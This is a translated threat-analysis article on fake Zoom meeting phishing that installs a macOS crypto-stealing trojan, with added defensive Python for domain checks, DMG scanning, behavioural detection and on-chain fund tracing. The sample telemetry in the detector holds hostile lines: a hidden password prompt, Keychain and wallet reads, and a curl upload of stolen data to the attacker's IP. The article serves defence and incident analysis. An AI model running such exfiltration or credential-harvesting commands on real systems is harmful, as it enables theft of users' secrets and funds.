Original title: "Seeing is not believing | Analysis of fake Zoom meeting phishing"
Original Source: SlowMist Technology
Editor's Note: Phishing using fake Zoom meeting links has recently become increasingly common in the crypto market. First, EurekaTrading founder Kuan Sun was hit by a US$13 million phishing attack after trusting a fake meeting invitation and installing a malicious plugin. Fortunately, Venus Protocol paused operations as an emergency measure, and with the assistance of multiple security teams the funds were ultimately recovered.
On September 8, Alexander Choi, founder of the crypto trading community Fortune Collective, also published a post revealing that he had been approached by a fake project through private messages on X. During the conversation he clicked a fraudulent link disguised as a meeting invitation, resulting in a loss of nearly US$1 million. Why are fake Zoom meeting phishing scams so effective, and how can investors avoid them and protect their funds? This article was first published on December 27, 2024. The original text follows:
Background
Recently, multiple users on X reported a phishing attack disguised as a Zoom meeting link. One victim clicked a malicious Zoom meeting link, installed the resulting malware, and had millions of dollars' worth of cryptocurrency stolen. The SlowMist security team analyzed the phishing page and the attack technique behind this incident and traced the attacker's funds.
( https://x.com/lsp8940/status/1871350801270296709 )
Phishing link analysis
The attackers used domains such as "app[.]us4zoom[.]us" to imitate a normal Zoom meeting link. The pages closely mimicked a real Zoom meeting page; when a user clicked the "Start Meeting" button, instead of launching the local Zoom client the page triggered the download of a malicious installer package.
Probing the domain above, we found the attacker's monitoring log endpoint (https[:]//app[.]us4zoom[.]us/error_log).
Decoding the log showed it to be an entry written when the page's script attempted to send a message via the Telegram API; the text was in Russian.
The site had been deployed 27 days before our analysis. The attacker is possibly Russian-speaking and appears to have begun looking for targets on November 14, using the Telegram API to be notified whenever a target clicked the download button on the phishing page.
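The lookalike domain works because "app.us4zoom.us" genuinely ends with the string "zoom.us", so a naive suffix check (or a quick glance) accepts it. The following is an added example, not code from the original article or from SlowMist, showing how to classify a supposed meeting link by its registrable domain instead. The allow-list ZOOM_DOMAINS is an assumption to be maintained by the reader; the refang step lets the check run directly on defanged indicators like the one quoted above.

```python
from urllib.parse import urlsplit

# Assumption (not from the original article): the registrable domains that
# genuinely belong to Zoom. Maintain this allow-list yourself.
ZOOM_DOMAINS = ("zoom.us", "zoom.com", "zoomgov.com")


def refang(text: str) -> str:
    """Turn a defanged indicator such as 'app[.]us4zoom[.]us' back into a real URL."""
    return (text.replace("[.]", ".").replace("(.)", ".")
                .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def hostname_of(url: str) -> str:
    """Lower-cased host part of a URL, ignoring userinfo, port and trailing dot.

    urlsplit() is used rather than string searching so that a URL such as
    'https://zoom.us@evil.example/' yields 'evil.example', not 'zoom.us'.
    """
    if "://" not in url:
        url = "https://" + url
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def classify_meeting_link(link: str) -> str:
    """Return 'legitimate', 'lookalike' or 'other' for a supposed Zoom link."""
    host = hostname_of(refang(link))
    for domain in ZOOM_DOMAINS:
        # Exact match or a real subdomain: the dot before the domain is what
        # rules out 'app.us4zoom.us', which merely *ends with* 'zoom.us'.
        if host == domain or host.endswith("." + domain):
            return "legitimate"
    if "zoom" in host:
        return "lookalike"
    return "other"


if __name__ == "__main__":
    for url in ("https://us04web.zoom.us/j/1234567890",
                "https://app[.]us4zoom[.]us/meeting",
                "https://zoom.us.evil.example/j/1",
                "https://zoom.us@evil.example/j/1"):
        print(f"{classify_meeting_link(url):11s} {url}")
```

The two cases worth noting are the brand name used as a subdomain of an attacker's domain ("zoom.us.evil.example") and the brand name placed in the userinfo part before "@"; both are caught only because the host is parsed rather than pattern-matched as text.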
Malware Analysis
The malicious installer is named "ZoomApp_v.3.14.dmg". Below is the window shown by the fake Zoom installer: it instructs the user to run the ZoomApp.file script in Terminal, and during execution the script prompts the user to enter their local account password.
The following is the execution content of the malicious file:
Decoding the above content showed that it is a malicious osascript (AppleScript) script.
Further analysis showed that the script looks for a hidden executable named ".ZoomApp" and runs it locally. Examining the original installer "ZoomApp_v.3.14.dmg" on disk confirmed that the image does indeed contain a hidden executable named ".ZoomApp".
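A dot-prefixed file is hidden from Finder, which is why the payload could sit next to the visible launcher script without the victim noticing. As an added example (not code from the article), the following walk of a mounted image flags hidden files that are actually code, by checking the Mach-O magic bytes and shebang rather than trusting the file name or extension. The sample directory it scans is constructed to mimic the layout described above; it is not the real ZoomApp_v.3.14.dmg.

```python
import os
import stat
import tempfile

# First four bytes of a Mach-O image (32/64-bit, either byte order) or a
# universal "fat" binary. 0xCAFEBABE is also the Java class-file magic, so
# treat that one as a hint rather than proof.
MACHO_MAGIC = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",   # MH_MAGIC / MH_CIGAM
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",   # MH_MAGIC_64 / MH_CIGAM_64
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",   # FAT_MAGIC / FAT_CIGAM
}


def describe_executable(path):
    """Return why a file looks like runnable code, or None if it does not."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(4)
        mode = os.stat(path).st_mode
    except OSError:
        return None
    if head in MACHO_MAGIC:
        return "Mach-O binary"
    if head.startswith(b"#!"):
        return "script with shebang"
    if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        return "executable bit set"
    return None


def find_hidden_executables(root):
    """Walk a mounted image and report dot-files (hidden in Finder) that are code."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.startswith("."):
                continue
            full = os.path.join(dirpath, name)
            reason = describe_executable(full)
            if reason is not None:
                hits.append((os.path.relpath(full, root), reason))
    return sorted(hits)


def build_sample_image():
    """Construct a directory that mimics the layout described in the article.

    Every file here is a synthetic stand-in, not content of the real DMG.
    """
    root = tempfile.mkdtemp(prefix="zoomapp_dmg_")
    samples = {
        # hidden Mach-O payload: 64-bit little-endian magic followed by padding
        ".ZoomApp": (b"\xcf\xfa\xed\xfe" + b"\x00" * 28, 0o755),
        # a second hidden helper, this time a shell script without the exec bit
        ".helper.sh": (b"#!/bin/sh\necho staged\n", 0o644),
        # visible launcher the victim is told to run in Terminal (not hidden)
        "ZoomApp.file": (b"#!/bin/bash\n./.ZoomApp\n", 0o755),
        # ordinary Finder metadata: hidden, but not code
        ".DS_Store": (b"\x00\x00\x00\x01Bud1", 0o644),
    }
    for name, (data, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    return root


def demo():
    """Scan the constructed sample and return what the walk flags."""
    return find_hidden_executables(build_sample_image())


if __name__ == "__main__":
    for rel, why in demo():
        print(f"{rel}: {why}")
```

Point it at the mount point of a suspicious image (for example a path under /Volumes after opening a DMG) before running anything from it; the visible ZoomApp.file is deliberately not reported, since the interesting finding is the code the user was not meant to see.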
Malicious behavior analysis
Static Analysis
We uploaded the binary to VirusTotal for analysis and found that it had already been flagged as malicious.
(https://www.virustotal.com/gui/file/e4b6285e183dd5e1c4e9eaf30cec886fd15293205e706855a48b30c890cbf5f2)
Static disassembly shows the entry code of the binary (see the figure in the original post), which decrypts embedded data and then executes a script.
The data section (also shown in the original figure) is mostly encrypted and encoded.
After decrypting the data, we found that the binary ultimately also executes a malicious osascript script (the full decrypted code has been shared at: https://pastebin.com/qRYQ44xa), which collects information from the user's device and sends it to the backend.
The following figure shows part of the code that enumerates the storage paths of different browser extension (plugin) IDs.
The following figure shows part of the code that reads the computer's Keychain.
After collecting system information, browser data, cryptocurrency wallet data, Telegram data, Notes data and cookies, the malicious code compresses them and sends them to a server controlled by the attacker (141.98.9.20).
Because the program tricks the user into entering their password while it runs, and the subsequent scripts also collect the machine's Keychain data (which may contain the various passwords the user has saved on the computer), the attacker can attempt to decrypt the collected data, recover the user's wallet mnemonics, private keys and other sensitive information, and steal the user's assets.
According to our analysis, the attacker's server IP is located in the Netherlands and has been flagged as malicious on the threat intelligence platform.
( https://www.virustotal.com/gui/ip-address/141.98.9.20 )
Dynamic Analysis
We executed the malicious program in a virtual environment and monitored its processes. The figure in the original post shows the processes that collect local data and the process that sends the data to the backend.
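The static and dynamic findings above describe a chain: a script run from Terminal, a password prompt, reads of the Keychain, browser extension storage and Telegram data, an archive, then an upload to 141.98.9.20. Individually each step is ordinary (zip, curl and osascript all have legitimate uses); the chain is what identifies a stealer. The following is an added example, not code from the article or from SlowMist's sandbox, that scores such a chain over process telemetry. The JSON event lines are constructed for this example; the file paths, the "with hidden answer" AppleScript idiom and the extension ID (MetaMask's, used only as a sample wallet extension) are assumptions about what an EDR would record, not facts reported by the article.

```python
import json

# Indicator from the article: the collection server the stealer uploads to.
KNOWN_C2 = {"141.98.9.20"}
SCRIPT_HOSTS = {"osascript", "bash", "sh", "zsh"}

# Each rule names one stage of the behaviour described in the static and
# dynamic analysis above. One stage alone is common in benign software;
# the chain is what makes the verdict.
STAGE_RULES = {
    "password_prompt": lambda e: e.get("proc") == "osascript"
                                 and "hidden answer" in e.get("cmdline", ""),
    "keychain_read":   lambda e: e.get("type") == "file"
                                 and "/Library/Keychains/" in e.get("path", ""),
    "wallet_access":   lambda e: e.get("type") == "file"
                                 and "Local Extension Settings" in e.get("path", ""),
    "telegram_access": lambda e: e.get("type") == "file"
                                 and "Telegram" in e.get("path", ""),
    "staging_archive": lambda e: e.get("proc") in {"zip", "tar", "ditto"}
                                 and e.get("parent") in SCRIPT_HOSTS,
    "c2_upload":       lambda e: e.get("type") == "network"
                                 and e.get("dst") in KNOWN_C2,
}

# Constructed sample telemetry (not the article's sandbox output): one JSON
# event per line, roughly what a process monitor would emit for the run.
SAMPLE_EVENTS = """
{"type":"process","parent":"Terminal","proc":"bash","cmdline":"bash /Volumes/ZoomApp/ZoomApp.file"}
{"type":"process","parent":"bash","proc":"osascript","cmdline":"osascript -e 'display dialog \\"Zoom needs your password\\" default answer \\"\\" with hidden answer'"}
{"type":"file","proc":"osascript","path":"/Users/victim/Library/Keychains/login.keychain-db","op":"read"}
{"type":"file","proc":"osascript","path":"/Users/victim/Library/Application Support/Google/Chrome/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn","op":"read"}
{"type":"file","proc":"osascript","path":"/Users/victim/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram/","op":"read"}
{"type":"process","parent":"osascript","proc":"zip","cmdline":"zip -r /tmp/out.zip /tmp/collect"}
{"type":"network","proc":"curl","dst":"141.98.9.20","dport":80,"cmdline":"curl -F file=@/tmp/out.zip http://141.98.9.20/upload"}
"""


def analyze(event_lines, min_stages=3):
    """Return the stages seen (with the first matching evidence) and a verdict."""
    seen = {}
    for line in event_lines.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for stage, rule in STAGE_RULES.items():
            if stage not in seen and rule(event):
                seen[stage] = (event.get("cmdline") or event.get("path")
                               or event.get("dst"))
    verdict = "infostealer-like" if len(seen) >= min_stages else "insufficient"
    return {"stages": seen, "verdict": verdict}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for stage, evidence in result["stages"].items():
        print(f"{stage:16s} {evidence}")
    print("verdict:", result["verdict"])
```

The min_stages threshold is the knob between false positives and misses: a single zip spawned from a shell script is not evidence, but a password dialog from osascript followed by a Keychain read and an upload to a listed address is. Replace KNOWN_C2 with your own indicator feed; IP-based matching alone is brittle once the attacker moves servers.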
MistTrack Analysis
We used the on-chain tracing tool MistTrack to analyze the attacker address 0x9fd15727f43ebffd0af6fecf6e01a810348ee6ac provided by the victim: the address received stolen assets worth over US$1 million, including USD0++, MORPHO and ETH; the USD0++ and MORPHO were swapped for 296 ETH.
According to MistTrack, the attacker's address received a small amount of ETH from 0xb01caea8c6c47bbf4f4b4c5080ca642043359c2e, apparently to cover transaction fees. This address (0xb01c) has only a single funding source, yet it has sent small amounts of ETH to nearly 8,800 addresses, which suggests it is a service dedicated to providing gas.
Filtering the recipients of this address (0xb01c) for addresses flagged as malicious, we found two phishing addresses, one of them labeled Pink Drainer. Further analysis of these two phishing addresses showed that their funds were mostly transferred to ChangeNOW and MEXC.
We then analyzed the movement of the stolen funds: a total of 296.45 ETH was transferred to a new address, 0xdfe7c22a382600dcffdde2c51aaa73d788ebae95.
This new address (0xdfe7) was first active in July 2023, operates across multiple chains, and currently holds 32.81 ETH.
The main ETH outflow paths from the new address (0xdfe7) are as follows:
· 200.79 ETH -> 0x19e0…5c98f
· 63.03 ETH -> 0x41a2…9c0b
· 8.44 ETH -> swapped for 15,720 USDT
· 14.39 ETH -> Gate.io
Subsequent transfers from these downstream addresses went to a variety of platforms, including Bybit, Cryptomus.com, Swapspace, Gate.io and MEXC, and were associated with multiple addresses labeled Angel Drainer and Theft by MistTrack. In addition, 99.96 ETH currently sits at address 0x3624169dfeeead9f3234c0ccd38c3b97cecafd01.
The new address (0xdfe7) also shows many USDT transactions, with funds transferred to platforms such as Binance, MEXC and FixedFloat.
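Two of the steps above are mechanical once you have an edge list of transfers: spotting the gas-provisioning address (a single funding source fanning out tiny payments to thousands of recipients) and summarising where a staging address's ETH went. The following is an added example, not MistTrack's code, that implements both heuristics plus a forward trace on a constructed ledger. The outflows from 0xdfe7 use the amounts the article reports; the funder's inbound row, its forty synthetic "0xfanout" recipients and the truncated recipient labels are stand-ins so the example runs offline. Thresholds are assumptions to tune against real data.

```python
from collections import defaultdict, deque

# Addresses named in the article.
HACKER = "0x9fd15727f43ebffd0af6fecf6e01a810348ee6ac"
FUNDER = "0xb01caea8c6c47bbf4f4b4c5080ca642043359c2e"
STAGING = "0xdfe7c22a382600dcffdde2c51aaa73d788ebae95"

# Constructed ledger of (sender, receiver, ETH). Rows out of STAGING use the
# article's figures; the funder's source and its fan-out are synthetic
# stand-ins for the ~8,800 real small transfers.
TRANSFERS = [
    ("0xfunder_source", FUNDER, 5.0),
    (FUNDER, HACKER, 0.01),
    *[(FUNDER, f"0xfanout{i:04d}", 0.01) for i in range(40)],
    (HACKER, STAGING, 296.45),
    (STAGING, "0x19e0…5c98f", 200.79),
    (STAGING, "0x41a2…9c0b", 63.03),
    (STAGING, "swap->USDT", 8.44),
    (STAGING, "Gate.io", 14.39),
]


def build_graph(transfers):
    """Distinct funders per address and summed outflow per (sender, receiver)."""
    inbound = defaultdict(set)
    outbound = defaultdict(lambda: defaultdict(float))
    for src, dst, amt in transfers:
        inbound[dst].add(src)
        outbound[src][dst] += amt
    return inbound, outbound


def fanout_funders(transfers, min_targets=20, max_amount=0.05):
    """Addresses shaped like a gas-provisioning service: exactly one funding
    source, many distinct recipients, and every payment tiny."""
    inbound, outbound = build_graph(transfers)
    return sorted(
        addr for addr, outs in outbound.items()
        if len(inbound.get(addr, ())) == 1
        and len(outs) >= min_targets
        and max(outs.values()) <= max_amount
    )


def outflow_summary(transfers, address):
    """Where an address's ETH went, largest recipient first."""
    _, outbound = build_graph(transfers)
    return dict(sorted(outbound[address].items(), key=lambda kv: -kv[1]))


def forward_trace(transfers, start, max_hops=3):
    """Breadth-first forward trace: each reachable address with its hop count."""
    _, outbound = build_graph(transfers)
    hops = {start: 0}
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        if hops[cur] >= max_hops:
            continue
        for nxt in outbound.get(cur, {}):
            if nxt not in hops:
                hops[nxt] = hops[cur] + 1
                queue.append(nxt)
    return hops


if __name__ == "__main__":
    print("gas funders:", fanout_funders(TRANSFERS))
    for dst, eth in outflow_summary(TRANSFERS, STAGING).items():
        print(f"{eth:8.2f} ETH -> {dst}")
    print("reachable from hacker:", forward_trace(TRANSFERS, HACKER))
```

The fan-out heuristic is what makes the 0xb01c observation actionable: once such an address is identified, every recipient it funded becomes a candidate for the same campaign, which is how the article links it to the Pink Drainer address. On a real chain the edge list comes from an indexer and the hop limit keeps the trace from exploding at the first exchange deposit address.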
Summary
In the phishing scheme described here, attackers disguise a malicious download as a legitimate Zoom meeting link and trick users into downloading and executing malware. Such malware typically has several capabilities: collecting system information, stealing browser data and harvesting cryptocurrency wallet information, all of which is sent to attacker-controlled servers. Attacks of this kind combine social engineering with a Trojan, and unwary users fall for them easily. The SlowMist security team recommends that users carefully verify meeting links before clicking them, never run software or commands from unknown sources, and install and regularly update antivirus software. For more security information, please read the SlowMist security team's "Blockchain Dark Forest Selfguard Handbook": https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md.